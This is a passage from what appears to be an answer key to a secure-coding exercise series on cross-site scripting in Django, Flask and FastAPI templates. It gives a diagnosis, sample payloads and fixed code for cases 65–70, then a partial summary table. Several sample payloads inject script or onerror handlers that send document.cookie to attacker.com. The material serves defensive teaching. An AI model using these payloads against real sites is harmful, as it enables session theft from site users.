class="dl">'</span><span class="s1">share-bar</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">button</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">button</span><span class="dl">'</span><span class="p">);</span> <span class="nx">button</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">click</span><span class="dl">'</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nf">sharePost</span><span class="p">(</span><span class="nx">postTitle</span><span class="p">)</span> <span class="p">}</span> <span class="p">);</span> <span class="nx">button</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Share</span><span class="dl">"</span><span class="p">;</span> <span class="nx">shareBar</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">button</span><span class="p">);</span> <span class="p">}</span> <span class="nf">buildShareBar</span><span class="p">(</span><span class="nx">shareMsg</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 65 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payloads:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>product.name: <span class="nt">&lt;/span&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;&lt;span&gt;</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>product.label: the"&gt;<span class="nt">&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;&lt;span&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Product</span> <span class="k">def</span> <span class="nf">product_card</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">product_id</span><span class="p">):</span> <span class="n">product</span> <span class="o">=</span> <span class="n">Product</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">product_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">product_card.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">product</span><span class="sh">'</span><span class="p">:</span> <span class="n">product</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# product_card.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"product-card"</span><span class="nt">&gt;</span> <span class="nt">&lt;span</span> <span class="na">class=</span><span class="s">"label label-{{ product.category }}"</span><span class="nt">&gt;</span>{{ product.name }}<span class="nt">&lt;/span&gt;</span> <span class="nt">&lt;p&gt;</span>{{ product.description }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <h3> Case 66 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping for the <code>sponsor_html</code> argument passed to <code>format_html()</code>.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>sponsor_name: <span class="nt">&lt;/p&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;&lt;p&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Event</span> <span class="k">def</span> <span class="nf">event_banner</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">event_id</span><span class="p">):</span> <span class="n">event</span> <span class="o">=</span> <span class="n">Event</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">event_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">event.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">title</span><span class="sh">'</span><span class="p">:</span> <span class="n">event</span><span class="p">.</span><span class="n">title</span><span class="p">,</span> <span class="sh">'</span><span class="s">sponsor</span><span class="sh">'</span><span class="p">:</span> <span class="n">event</span><span class="p">.</span><span class="n">sponsor_name</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# event.html #} <span class="nt">&lt;section</span> <span class="na">class=</span><span class="s">"event-section"</span><span class="nt">&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"banner"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;p&gt;</span>Sponsored by: {{ sponsor }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/section&gt;</span> </code></pre> </div> <h3> Case 67 — Answer </h3> <ol> <li><p>Stored XSS. Wrong Context Escaping. Unnecessary enclosing of <code>{{ author | tojson }}</code> in double quotes since <code>tojson</code> does this automatically. Remember <code>tojson</code> is used for Javascript-context escaping in popular frameworks such as Flask and FastAPI. Even after removing the enclosed doubled quotes the <code>innerHTML</code> in the frontend template still leaves the code vulnerable to XSS. So the <code>innerHTML</code> has to be replaced with escaped HTML content.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>author: <span class="nt">&lt;/strong&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie);"</span><span class="nt">&gt;&lt;strong&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Review</span> <span class="k">def</span> <span class="nf">review_page</span><span class="p">(</span><span class="n">review_id</span><span class="p">):</span> <span class="n">review</span> <span class="o">=</span> <span class="n">Review</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">review_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">review.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">author</span><span class="o">=</span><span class="n">review</span><span class="p">.</span><span class="n">author</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="n">review</span><span class="p">.</span><span class="n">body</span><span class="p">,</span> <span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# review.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"review"</span><span class="nt">&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"review-body"</span><span class="nt">&gt;&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">author</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">author</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">var</span> <span class="nx">body</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">body</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">function</span> <span class="nf">renderReview</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">review-body</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">authorname</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">strong</span><span class="dl">'</span><span class="p">);</span> <span class="nx">authorname</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">author</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">bodytext</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createTextNode</span><span class="p">(</span><span class="s2">`: </span><span class="p">${</span><span class="nx">body</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">authorname</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">bodytext</span><span class="p">);</span> <span class="p">}</span> <span class="nf">renderReview</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 68 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping for <code>bio_preview</code>. The <code>mark_safe()</code> tells Django that <code>bio_preview</code> is safe for HTML execution provided the input is larger than 100 characters (Why would the developer do that?).</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>bio_preview: <span class="nt">&lt;/p&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;&lt;p&gt;&lt;/p&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;&lt;p&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">UserProfile</span> <span class="k">def</span> <span class="nf">profile_badge</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="n">profile</span> <span class="o">=</span> <span class="n">UserProfile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">profile_badge.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">:</span> <span class="n">profile</span><span class="p">.</span><span class="n">username</span><span class="p">,</span> <span class="sh">'</span><span class="s">location</span><span class="sh">'</span><span class="p">:</span> <span class="n">profile</span><span class="p">.</span><span class="n">location</span><span class="p">,</span> <span class="sh">'</span><span class="s">bio_preview</span><span class="sh">'</span><span class="p">:</span> <span class="n">profile</span><span class="p">.</span><span class="n">bio</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# profile_badge.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"badge"</span><span class="nt">&gt;</span> <span class="nt">&lt;h3&gt;</span>{{ username }}<span class="nt">&lt;/h3&gt;</span> <span class="nt">&lt;p&gt;&lt;em&gt;</span>{{ location }}<span class="nt">&lt;/em&gt;&lt;/p&gt;</span> <span class="nt">&lt;p&gt;</span>{{ bio_preview }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <h3> Case 69 — Answer </h3> <ol> <li><p>Stored XSS. Wrong Context Escaping in initialization of <code>title</code>. Also Missing Escaping for DOM sink in both <code>renderHeader()</code> and <code>renderTags()</code>.</p></li> <li><p>Sample payloads:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>title: <span class="nt">&lt;/h1&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie)"</span><span class="nt">&gt;&lt;h1&gt;</span> author: <span class="nt">&lt;/p&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie)"</span><span class="nt">&gt;&lt;p&gt;</span> tag: <span class="nt">&lt;/span&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie)"</span><span class="nt">&gt;&lt;span&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">get_post_by_id</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/post/{post_id}</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">post_detail</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">post_id</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span> <span class="n">post</span> <span class="o">=</span> <span class="nf">get_post_by_id</span><span class="p">(</span><span class="n">post_id</span><span class="p">)</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">post.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">:</span> <span class="n">post</span><span class="p">.</span><span class="n">title</span><span class="p">,</span> <span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">:</span> <span class="n">post</span><span class="p">.</span><span class="n">author</span><span class="p">,</span> <span class="sh">"</span><span class="s">tags</span><span class="sh">"</span><span class="p">:</span> <span class="n">post</span><span class="p">.</span><span class="n">tags</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# post.html #} <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"post-header"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"tag-list"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">title</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">title</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">var</span> <span class="nx">author</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">author</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">var</span> <span class="nx">tags</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">tags</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">function</span> <span class="nf">renderHeader</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">postheader</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">post-header</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">titlehead</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">h1</span><span class="dl">'</span><span class="p">);</span> <span class="nx">titlehead</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">title</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">authorp</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">authorp</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`By: </span><span class="p">${</span><span class="nx">author</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">postheader</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">titlehead</span><span class="p">);</span> <span class="nx">postheader</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">authorp</span><span class="p">);</span> <span class="p">}</span> <span class="kd">function</span> <span class="nf">renderTags</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">taglist</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">tag-list</span><span class="dl">'</span><span class="p">);</span> <span class="nx">tags</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">tag</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">spantag</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">span</span><span class="dl">'</span><span class="p">);</span> <span class="nx">spantag</span><span class="p">.</span><span class="nx">className</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">tag</span><span class="dl">"</span><span class="p">;</span> <span class="nx">spantag</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">tag</span><span class="p">;</span> <span class="nx">taglist</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">spantag</span><span class="p">);</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">renderHeader</span><span class="p">();</span> <span class="nf">renderTags</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 70 — Answer </h3> <ol> <li><p>No XSS vulnerability. HTML escaping <code>escape(body)</code> at storage time causes double-escaping display issues in the HTML template and corrupts data delivered through the JSON API.</p></li> <li><p>No relevant payload.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Comment</span> <span class="k">def</span> <span class="nf">submit_comment</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">request_body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">body</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span> <span class="n">user</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">user</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="n">request_body</span><span class="p">,</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="sh">'</span><span class="s">comment_list</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">comment_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">order_by</span><span class="p">(</span> <span class="n">Comment</span><span class="p">.</span><span class="n">created_at</span><span class="p">.</span><span class="nf">desc</span><span class="p">()</span> <span class="p">).</span><span class="nf">all</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">comments.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">comments</span><span class="sh">'</span><span class="p">:</span> <span class="n">comments</span><span class="p">,</span> <span class="p">})</span> <span class="k">def</span> <span class="nf">comment_api</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">().</span><span class="nf">values</span><span class="p">(</span><span class="sh">'</span><span class="s">user__username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">body</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">comments</span><span class="sh">'</span><span class="p">:</span> <span class="nf">list</span><span class="p">(</span><span class="n">comments</span><span class="p">)})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# comments.html #} {% for comment in comments %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment"</span><span class="nt">&gt;</span> <span class="nt">&lt;p&gt;</span>{{ comment.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h2> Summary Table: All 70 Cases </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Case</th> <th>Framework</th> <th>XSS Type</th> <th>Bug Type</th> <th>Attack Context</th> <th>Fix Applied</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Django</td> <td>Reflected</td> <td>Missing (autoescaping bypassed by `\</td> <td>safe`)</td> <td>HTML body</td> </tr> <tr> <td>2</td> <td>Django</td> <td>Reflected</td> <td>Wrong context</td> <td>JS string in <code>&lt;script&gt;</code> </td> <td>`\</td> </tr> <tr> <td>3</td> <td>Django</td> <td>Stored</td> <td>Misplaced</td> <td>HTML body</td> <td>Store raw; remove {% raw %}<code>escape()</code> + <code>mark_safe()</code> </td> </tr> <tr> <td>4</td> <td>Flask</td> <td>Reflected</td> <td>Missing + SSTI</td> <td>HTML body</td> <td>Replace <code>render_template_string()</code> + <code>%s</code> </td> </tr> <tr> <td>5</td> <td>Flask</td> <td>Reflected</td> <td>Wrong context</td> <td> <code>href</code> attribute</td> <td>URL scheme validation</td> </tr> <tr> <td>6</td> <td>Flask</td> <td>None</td> <td>Display only</td> <td>—</td> <td>Remove <code>html.escape()</code> (double-escape)</td> </tr> <tr> <td>7</td> <td>FastAPI</td> <td>Reflected</td> <td>Missing</td> <td>HTML body</td> <td>Replace <code>HTMLResponse</code> f-string with <code>Jinja2Templates</code> </td> </tr> <tr> <td>8</td> <td>FastAPI + JS</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> sink</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>9</td> <td>FastAPI + React</td> <td>DOM</td> <td>Wrong context</td> <td> <code>innerHTML</code> sink (React ref)</td> <td>Remove server escape; <code>textContent</code> </td> </tr> <tr> <td>10</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> sink</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>11</td> <td>React</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> in custom hook</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>12</td> <td>Vanilla JS</td> <td>DOM</td> <td>Wrong context</td> <td> <code>innerHTML</code> sink</td> <td>Remove <code>encodeURIComponent</code>; <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>13</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>{% autoescape off %}</code>)</td> <td>HTML body</td> <td>Remove <code>{% autoescape off %}</code> block</td> </tr> <tr> <td>14</td> <td>Flask</td> <td>Reflected</td> <td>Missing (<code>Markup()</code>)</td> <td>HTML body</td> <td>Remove <code>Markup()</code>; store raw</td> </tr> <tr> <td>15</td> <td>FastAPI</td> <td>Reflected</td> <td>Missing</td> <td>JS variable in <code>&lt;script&gt;</code> </td> <td>`\</td> </tr> <tr> <td>16</td> <td>Django</td> <td>Reflected</td> <td>Wrong context</td> <td>Unquoted HTML attribute</td> <td>Add quotes around {% raw %}<code>{{ css_class }}</code> </td> </tr> <tr> <td>17</td> <td>Flask</td> <td>Stored</td> <td>Misplaced</td> <td>HTML body</td> <td>Store raw; remove <code>escape()</code> + `\</td> </tr> <tr> <td>18</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td>{% raw %}<code>innerHTML</code> sink (hash source)</td> <td> <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>19</td> <td>React</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> sink</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>20</td> <td>Flask</td> <td>Reflected</td> <td>Wrong context</td> <td> <code>href</code> attribute</td> <td>URL scheme validation</td> </tr> <tr> <td>21</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> sink (postMessage source)</td> <td> <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>22</td> <td>Django</td> <td>Reflected</td> <td>Missing</td> <td>HTML body + `\</td> <td>safe`</td> </tr> <tr> <td>23</td> <td>FastAPI</td> <td>Stored</td> <td>Misplaced</td> <td>HTML body</td> <td>Store raw; remove <code>escape()</code> + `\</td> </tr> <tr> <td>24</td> <td>Django</td> <td>Reflected</td> <td>Missing ({% raw %}<code>mark_safe()</code>)</td> <td>HTML attribute</td> <td>Remove <code>mark_safe()</code> </td> </tr> <tr> <td>25</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> sink</td> <td> <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>26</td> <td>Flask</td> <td>Reflected</td> <td>Wrong context</td> <td>JS string in <code>alert()</code> </td> <td>Remove <code>escape()</code>; `\</td> </tr> <tr> <td>27</td> <td>Django</td> <td>Reflected</td> <td>Missing ({% raw %}<code>mark_safe()</code>)</td> <td>HTML body</td> <td> <code>format_html()</code> with <code>{}</code> args</td> </tr> <tr> <td>28</td> <td>FastAPI</td> <td>Reflected</td> <td>Misplaced (A) + Wrong context (B)</td> <td>HTML body + unquoted attribute</td> <td>Remove <code>escape()</code>; add quotes</td> </tr> <tr> <td>29</td> <td>Vanilla JS</td> <td>DOM</td> <td>Wrong context</td> <td> <code>innerHTML</code> sink</td> <td>Remove <code>encodeURIComponent</code>; <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>30</td> <td>React</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> via ref callback</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>31</td> <td>Django</td> <td>Reflected</td> <td>Wrong context (two layers)</td> <td>JS string + <code>innerHTML</code> sink</td> <td>`\</td> </tr> <tr> <td>32</td> <td>FastAPI</td> <td>Reflected</td> <td>Missing</td> <td>HTML body + {% raw %}<code>href</code> attribute</td> <td>Replace f-string with <code>Jinja2Templates</code> </td> </tr> <tr> <td>33</td> <td>Flask + JS</td> <td>Stored</td> <td>Misplaced</td> <td> <code>innerHTML</code> sink</td> <td>Store raw; <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>34</td> <td>Django</td> <td>None</td> <td>None</td> <td>—</td> <td>Code correct; template refactor optional</td> </tr> <tr> <td>35</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td> <code>insertAdjacentHTML</code> sink</td> <td> <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>36</td> <td>React</td> <td>DOM</td> <td>Missing</td> <td> <code>innerHTML</code> sink</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>37</td> <td>Flask</td> <td>Stored</td> <td>Missing (<code>{% autoescape off %}</code>)</td> <td>HTML body</td> <td>Remove <code>{% autoescape off %}</code> </td> </tr> <tr> <td>38</td> <td>Django</td> <td>Reflected</td> <td>Wrong context</td> <td>JS string + 